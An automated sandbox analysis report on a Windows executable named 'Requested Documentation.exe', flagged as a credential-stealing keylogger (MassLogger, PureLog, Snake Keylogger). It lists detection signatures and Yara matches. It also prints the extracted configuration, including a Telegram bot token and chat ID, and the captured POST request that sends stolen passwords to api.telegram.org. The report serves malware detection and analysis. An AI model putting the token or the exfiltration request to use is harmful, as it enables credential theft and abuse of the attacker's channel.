Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Requested Documentation.exe

Overview

General Information

Sample name:Requested Documentation.exe
Analysis ID:1582315
MD5:7ccc5d635cbd8627f4f2aac3e54248d0
SHA1:cc315dfc181424321b7e82bb19bab2d949346aa3
SHA256:bbe22c9c5c417bd5f92f310e994ed7b0ea3323feabc7d16eb14d25b84059d38d
Tags:exeRedLineStealeruser-TeamDreier
Infos:

Detection

MassLogger RAT, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected MassLogger RAT
Yara detected PureLog Stealer
Yara detected Telegram RAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code references suspicious native API functions
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Contains functionality to log keystrokes (.Net Source)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Requested Documentation.exe (PID: 7160 cmdline: "C:\Users\user\Desktop\Requested Documentation.exe" MD5: 7CCC5D635CBD8627F4F2AAC3E54248D0)
    • RegSvcs.exe (PID: 6344 cmdline: "C:\Users\user\Desktop\Requested Documentation.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg/sendMessage"}

Threatname: MassLogger

{"EXfil Mode": "Telegram", "Telegram Token": "7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg", "Telegram Chatid": "5839829477"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.4195549019.0000000004061000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000001.00000002.4195549019.0000000004061000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000001.00000002.4195549019.0000000004061000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000001.00000002.4195549019.0000000004061000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          00000001.00000002.4195549019.0000000004061000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0x21c2d:$a1: get_encryptedPassword
          • 0x49d65:$a1: get_encryptedPassword
          • 0x21c01:$a2: get_encryptedUsername
          • 0x49d39:$a2: get_encryptedUsername
          • 0x21cc5:$a3: get_timePasswordChanged
          • 0x49dfd:$a3: get_timePasswordChanged
          • 0x21bdd:$a4: get_passwordField
          • 0x49d15:$a4: get_passwordField
          • 0x21c43:$a5: set_encryptedPassword
          • 0x49d7b:$a5: set_encryptedPassword
          • 0x21a10:$a7: get_logins
          • 0x49b48:$a7: get_logins
          • 0x20f82:$a8: GetOutlookPasswords
          • 0x490ba:$a8: GetOutlookPasswords
          • 0x20496:$a9: StartKeylogger
          • 0x485ce:$a9: StartKeylogger
          • 0x1eef7:$a10: KeyLoggerEventArgs
          • 0x4702f:$a10: KeyLoggerEventArgs
          • 0x1eec6:$a11: KeyLoggerEventArgsEventHandler
          • 0x46ffe:$a11: KeyLoggerEventArgsEventHandler
          • 0x21ae4:$a13: _encryptedPassword
          Click to see the 27 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          1.2.RegSvcs.exe.400000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x700:$s3: 83 EC 38 53 B0 7A 88 44 24 2B 88 44 24 2F B0 20 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1e9d0:$s5: delete[]
          • 0x1de88:$s6: constructor or from DllMain.
          1.2.RegSvcs.exe.5680ee8.6.raw.unpackJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
            1.2.RegSvcs.exe.5680ee8.6.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              1.2.RegSvcs.exe.5680ee8.6.raw.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                1.2.RegSvcs.exe.5680ee8.6.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  Click to see the 94 entries

                  Sigma Signatures

                  No Sigma rule has matched

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-30T10:57:11.526050+010020577441Malware Command and Control Activity Detected192.168.2.449732149.154.167.220443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-30T10:57:04.598653+010028032742Potentially Bad Traffic192.168.2.449730132.226.247.7380TCP
                  2024-12-30T10:57:10.598757+010028032742Potentially Bad Traffic192.168.2.449730132.226.247.7380TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-30T10:57:11.223524+010018100081Potentially Bad Traffic192.168.2.449732149.154.167.220443TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Found malware configuration
                  Source: 00000001.00000002.4195549019.0000000004061000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg", "Telegram Chatid": "5839829477"}
                  Source: RegSvcs.exe.6344.1.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg/sendMessage"}
                  Multi AV Scanner detection for submitted file
                  Source: Requested Documentation.exeVirustotal: Detection: 46%Perma Link
                  Source: Requested Documentation.exeReversingLabs: Detection: 57%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for sample
                  Source: Requested Documentation.exeJoe Sandbox ML: detected

                  Location Tracking

                  barindex
                  Tries to detect the country of the analysis system (by using the IP)
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Requested Documentation.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49731 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49732 version: TLS 1.2
                  Source: Binary string: _.pdb source: RegSvcs.exe, 00000001.00000002.4195549019.0000000004061000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4193632082.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4195898548.0000000005680000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: wntdll.pdbUGP source: Requested Documentation.exe, 00000000.00000003.1736119102.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, Requested Documentation.exe, 00000000.00000003.1735017129.0000000003E50000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: Requested Documentation.exe, 00000000.00000003.1736119102.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, Requested Documentation.exe, 00000000.00000003.1735017129.0000000003E50000.00000004.00001000.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009E445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_009E445A
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009EC6D1 FindFirstFileW,FindClose,0_2_009EC6D1
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009EC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_009EC75C
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009EEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_009EEF95
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009EF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_009EF0F2
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009EF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_009EF3F3
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009E37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_009E37EF
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009E3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_009E3B12
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009EBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_009EBCBC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h1_2_02EAE108
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0572F1E1h1_2_0572EF30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0572F937h1_2_0572F518
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0572F937h1_2_0572F507
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0572F937h1_2_0572F864
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05EEB465h1_2_05EEB128
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05EEAF79h1_2_05EEACD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05EEFB48h1_2_05EEF8A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05EEAB21h1_2_05EEA878
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05EEF6F0h1_2_05EEF448
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05EEA6C9h1_2_05EEA420
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05EEDED8h1_2_05EEDC30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05EEA271h1_2_05EE9FC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05EEDA80h1_2_05EED7D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05EED628h1_2_05EED380
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05EE9E19h1_2_05EE9B70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05EED1D0h1_2_05EECF28
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05EEF298h1_2_05EEEF10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05EEBFA2h1_2_05EEBEF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05EEBFA2h1_2_05EEBEF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05EECD78h1_2_05EECAD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05EEC920h1_2_05EEC678
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov ecx, dword ptr [ebp-38h]1_2_06AA3CBC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov ecx, dword ptr [ebp-38h]1_2_06AA3C96
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov ecx, dword ptr [ebp-38h]1_2_06AA7D53

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49732 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49732 -> 149.154.167.220:443
                  Uses the Telegram API (likely for C&C communication)
                  Source: unknownDNS query: name: api.telegram.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg/sendDocument?chat_id=5839829477&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd288e6a54ccbbHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                  Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                  Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49730 -> 132.226.247.73:80
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49731 version: TLS 1.0
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009F22EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_009F22EE
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                  Source: unknownHTTP traffic detected: POST /bot7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg/sendDocument?chat_id=5839829477&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd288e6a54ccbbHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
                  Source: RegSvcs.exe, 00000001.00000002.4194140589.00000000031F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                  Source: RegSvcs.exe, 00000001.00000002.4194140589.000000000314C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                  Source: RegSvcs.exe, 00000001.00000002.4194140589.00000000031F6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4194140589.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4194140589.0000000003140000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: RegSvcs.exe, 00000001.00000002.4194140589.00000000030C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: RegSvcs.exe, 00000001.00000002.4195976389.00000000056C0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4195549019.0000000004061000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4193632082.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4195898548.0000000005680000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: RegSvcs.exe, 00000001.00000002.4194140589.000000000316D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                  Source: RegSvcs.exe, 00000001.00000002.4194140589.00000000030C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: RegSvcs.exe, 00000001.00000002.4194140589.00000000031F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                  Source: RegSvcs.exe, 00000001.00000002.4194140589.00000000031F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: RegSvcs.exe, 00000001.00000002.4195976389.00000000056C0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4195549019.0000000004061000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4193632082.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4195898548.0000000005680000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
                  Source: RegSvcs.exe, 00000001.00000002.4194140589.00000000031F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg/sendDocument?chat_id=5839
                  Source: RegSvcs.exe, 00000001.00000002.4194140589.000000000314C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                  Source: RegSvcs.exe, 00000001.00000002.4195976389.00000000056C0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4195549019.0000000004061000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4193632082.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4194140589.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4195898548.0000000005680000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: RegSvcs.exe, 00000001.00000002.4194140589.000000000314C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49732 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Contains functionality to log keystrokes (.Net Source)
                  Source: 1.2.RegSvcs.exe.56c0000.8.raw.unpack, UltraSpeed.cs.Net Code: VKCodeToUnicode
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009F4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_009F4164
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009F4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_009F4164
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009F3F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_009F3F66
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009E001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_009E001C
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_00A0CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00A0CABC

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 1.2.RegSvcs.exe.5680ee8.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 1.2.RegSvcs.exe.5680ee8.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 1.2.RegSvcs.exe.2db1ade.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 1.2.RegSvcs.exe.2db1ade.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 1.2.RegSvcs.exe.408e590.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 1.2.RegSvcs.exe.408e590.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 1.2.RegSvcs.exe.4066458.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 1.2.RegSvcs.exe.4066458.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.Requested Documentation.exe.3c70000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 1.2.RegSvcs.exe.2db1ade.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 1.2.RegSvcs.exe.2db1ade.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 1.2.RegSvcs.exe.56c0000.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 1.2.RegSvcs.exe.56c0000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 1.2.RegSvcs.exe.2db0bf6.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 1.2.RegSvcs.exe.5680ee8.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 1.2.RegSvcs.exe.5680ee8.6.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 1.2.RegSvcs.exe.4066458.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 1.2.RegSvcs.exe.4066458.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
